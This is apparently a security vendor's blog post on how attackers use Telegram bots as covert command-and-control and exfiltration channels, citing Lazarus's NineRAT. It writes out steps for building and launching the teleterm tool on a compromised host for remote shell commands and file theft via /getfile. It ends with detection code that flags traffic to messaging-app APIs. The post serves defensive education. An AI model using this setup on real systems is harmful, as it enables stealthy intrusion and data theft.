In recent years, there has been a significant increase in adversaries exploiting popular messaging apps such as Telegram, Discord, Signal, and others to conceal their malicious activities. Among these platforms, Telegram stands out due to its robust security features, including end-to-end encryption and anonymous account creation, making it a go-to tool for cybercriminals.

Overview

Most recently, Telegram founder and CEO Pavel Durov was arrested in France over allegations that the platform is being used for illicit activity. The Paris prosecutor’s office claims Durov was detained as part of a judicial inquiry opened in July involving 12 alleged criminal violations, including complicity in selling child sexual abuse material and in drug trafficking, fraud, abetting organized crime transactions and refusing to share information or documents with investigators when required by law.

Telegram responded to the arrest, saying it upholds EU laws and performs content moderation “within industry standards and constantly improving.”

In this article, we will examine how Telegram is used by cyber criminals to perform illicit activities such as establishing covert Command and Control (C2) channels, executing data exfiltration, sharing intelligence, and delivering malicious payloads, all while maintaining operational stealth and evading detection by conventional security measures.

Lazarus APT Telegram-Based Malware “NineRAT”

Lazarus, a highly sophisticated North Korean APT group, has increasingly employed innovative and unconventional tactics to enhance the stealth and effectiveness of its cyber operations, including through Telegram. In their recent “Operation Blacksmith” campaign, which exploited the Log4Shell vulnerability, they deployed NineRAT – a remote access Trojan first identified in March 2023.

Notably, NineRAT utilizes Telegram as its Command-and-Control (C2) channel, a strategic decision capitalizing on Telegram’s robust encryption and its reputation as a trusted communication app. By embedding their C2 communications within Telegram traffic, Lazarus effectively conceals their malicious activities within legitimate traffic, complicating detection efforts by conventional security measures. This approach significantly enhances their ability to evade detection, bypass security mechanisms, and maintain persistence over compromised systems, underscoring the group’s sophistication in cyber operations.

The Attack Flow

  1. The attacker sets up a Telegram account and a bot and prepares a designated Telegram C2 Malware.
  2. The attacker gains initial access to the target after exploiting a vulnerability.
  3. The attacker deploys the Telegram C2 Malware on the target to communicate with his Telegram bot.
  4. Communication is established between the compromised target and the attacker bot via Telegram API.
  5. The attacker issues commands to the target using his Telegram bot via Telegram API.
  6. The commands are transmitted via Telegram API to the compromised target and executed.

In this attack flow, the C2 traffic is encrypted and its malicious nature and source are disguised, so it appears to be legitimate Telegram traffic.

The Exploitation Phases

Imagine an attacker has gained initial access to your host and aims to establish a covert command and control (C2) channel. The attacker’s objective is to maintain persistence on the compromised host, execute commands, exfiltrate data, and disguise his communication so that it appears legitimate to conventional security products, all while preserving anonymity. To achieve this, the attacker can exploit Telegram for stealthy communication and data exfiltration; the actions required to do so are listed below.

Setting up a Telegram Account & Creating a Bot

The attacker will need to set up a Telegram account & a bot using the Telegram BotFather service with the command /newbot and follow the instructions. Once the bot is created, he will get a unique API token that will be used to interact with Telegram API and communicate with his bot.

Deploying C2 Telegram-Based Malware That Will Communicate with Telegram API

To deploy his C2 malware, he can write a designated Python script or use already written open-source tools such as teleterm (Telegram Bot Exec Terminal Command) to establish stealth communication with his chatbot and execute commands on the compromised host (make sure Go ^1.18, gcc & git are installed). Once installed, he can modify the .teleterm/config.yaml file to include his unique Telegram API token.

# git clone https://github.com/alfiankan/teleterm
# cd teleterm/
/teleterm# go build -o teleterm-bin ./cmd...
/teleterm# ./teleterm-bin fresh
# nano /root/.teleterm/config.yaml
----------------------------------
teleterm:
  telegram_token: "xxxxxx" # --> API Token
  shell_executor: "/bin/bash"
whitelist:
  - <USER_ID> # --> User Chat ID 
execution_timeout_second: 10
# Press Ctrl + X (to save & exit) 
----------------------------------
/teleterm# ./teleterm-bin &


Executing Commands on the Compromised Host with the Telegram Bot

The attacker can now use the teleterm program by running ./teleterm-bin & on the compromised host so that it runs in the background, and execute commands from his chatbot using the command /run with the desired bash command as an argument. Note that teleterm also allows pre-configuring commands for the bot so that they do not have to be typed again and again: this is done with the command /addbutton <button_name>!!<command> (e.g. /addbutton ping!!ping 8.8.8.8), after which it can be run with /run ping.

teleterm will execute the commands on the host and send their output to the attacker’s Telegram bot via Telegram API. Once his C2 channel is established, he can now also look for sensitive files and exfiltrate data from the compromised host using the command /getfile, all while remaining anonymous and undetected due to the use of Telegram API, the traffic’s legitimate appearance and lack of monitoring.

Compromised Target – Installation of Telegram-Based Malware

Telegram Bot – Executing Commands

MITRE ATT&CK® Techniques

Adversaries leveraging Telegram’s API for C2 operations and data exfiltration align with MITRE sub-technique T1071.001, since they embed their malicious communications within a legitimate web protocol and blend in with regular encrypted traffic to avoid detection. They also align with MITRE technique T1567, since they use Telegram, a widely trusted service, to exfiltrate data, exploiting the platform’s legitimacy to bypass security measures and remain undetected within normal network traffic.

T1071.001: Application Layer Protocol – Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection or network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

T1567: Exfiltration Over Web Service

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them before compromise.

Advanced Runtime Threat Detection with eBPF

When analyzing the network traffic, requests originating from a host and directed toward the API of a messaging app, such as api.telegram.org, can serve as a strong indicator of potential malicious activity. This traffic pattern may suggest that the host is utilizing Telegram’s API for command and control (C2) operations or data exfiltration. By closely examining these requests, security analysts can identify and correlate suspicious communication behaviors and uncover sophisticated threats that might otherwise evade detection by blending into legitimate traffic.

To detect this kind of activity, Upwind provides the following coverage by leveraging eBPF technology:

  • Upwind’s eBPF sensor will detect the installation & compilation of suspicious scripts, tools, or apps on the monitored host.
  • It will also detect their execution on the process level.
  • The Upwind sensor will detect out-of-baseline events, such as unexpected processes or network communications occurring on a host by learning and understanding the normal processes and communications that usually occur on the host and analyzing what is unusual or unexpected.
  • The Upwind sensor will constantly monitor the network traffic in real-time and alert on suspicious communications to and from the host, such as calls originating from the host to messaging app APIs such as Telegram, Discord, Signal, and more.
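As an added illustration of the correlation described above (example code written for this article, not Upwind’s sensor or its output), the following Python snippet learns a baseline of process/destination pairs from a clean window of constructed connection events, then flags outbound connections to messaging app API endpoints (api.telegram.org from this page; the Discord hosts are an assumed extension) and any process/destination pair not seen in the baseline. The event format and all host names, PIDs and IP addresses are constructed for the example.

```python
import re

# Constructed sample sensor events (not real Upwind output); assumed format: "<ts> <host> <exec|connect> pid=<n> comm=<name> key=value ..."
BASELINE_WINDOW = """\
2024-09-01T09:00:05Z web01 connect pid=4102 comm=nginx dst=203.0.113.10:443 sni=cdn.example.com
"""
EVENTS = """\
2024-09-01T10:00:05Z web01 connect pid=4102 comm=nginx dst=203.0.113.10:443 sni=cdn.example.com
2024-09-01T10:02:11Z web01 exec pid=5120 comm=teleterm-bin path=/root/teleterm/teleterm-bin
2024-09-01T10:02:12Z web01 connect pid=5120 comm=teleterm-bin dst=203.0.113.99:443 sni=api.telegram.org
2024-09-01T10:03:41Z web01 connect pid=5133 comm=curl dst=203.0.113.99:443 sni=api.telegram.org
"""
# api.telegram.org is the endpoint named on the page; the Discord hosts are an assumed extension.
MESSAGING_API_HOSTS = {"api.telegram.org", "discord.com", "discordapp.com"}
EVENT_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>exec|connect) pid=(?P<pid>\d+) comm=(?P<comm>\S+)(?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Parse one event line into a dict, or return None if it does not match the assumed format."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"] = int(ev["pid"])
    ev.update(KV_RE.findall(ev.pop("rest")))  # remaining key=value fields (dst, sni, path, ...)
    return ev

def learn_baseline(lines):
    """Record the (process name, TLS server name) pairs observed during a known-clean window."""
    baseline = set()
    for ev in map(parse_event, lines.splitlines()):
        if ev and ev["kind"] == "connect" and "sni" in ev:
            baseline.add((ev["comm"], ev["sni"]))
    return baseline

def detect(lines, baseline):
    """Flag connections to messaging app APIs and connections outside the learned baseline."""
    findings = []
    for ev in map(parse_event, lines.splitlines()):
        if not ev or ev["kind"] != "connect":
            continue
        sni = ev.get("sni", "")
        reasons = []
        if sni in MESSAGING_API_HOSTS:
            reasons.append("messaging-app API endpoint (T1071.001 / T1567)")
        if (ev["comm"], sni) not in baseline:
            reasons.append("process/destination pair not in learned baseline")
        if reasons:  # both reasons together is the strongest signal, so rank it higher
            findings.append({"pid": ev["pid"], "comm": ev["comm"], "sni": sni, "reasons": reasons, "severity": "high" if len(reasons) == 2 else "medium"})
    return findings
```

Running detect(EVENTS, learn_baseline(BASELINE_WINDOW)) yields two high-severity findings, for teleterm-bin and curl, while the baselined nginx connection is not reported.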

Any suspicious process or network communication is then surfaced in Upwind’s Threats Module, giving the customer enhanced visibility over their processes, network traffic, and threats. In the example below, you can see how an attacker would exfiltrate a secret file using a simple curl request to the Telegram API.

This would be automatically detected by the Upwind sensor, as shown in the example below.

By leveraging eBPF technology and implementing multiple security layers to safeguard an organization’s assets, Upwind provides full coverage of the system behavior and real-time threat detection and response, allowing you to neutralize threats the moment they emerge.

Learn More

To learn more about how Upwind protects against network threats such as suspicious communications with messaging apps APIs and more, visit the Upwind Documentation Center or Schedule a Demo.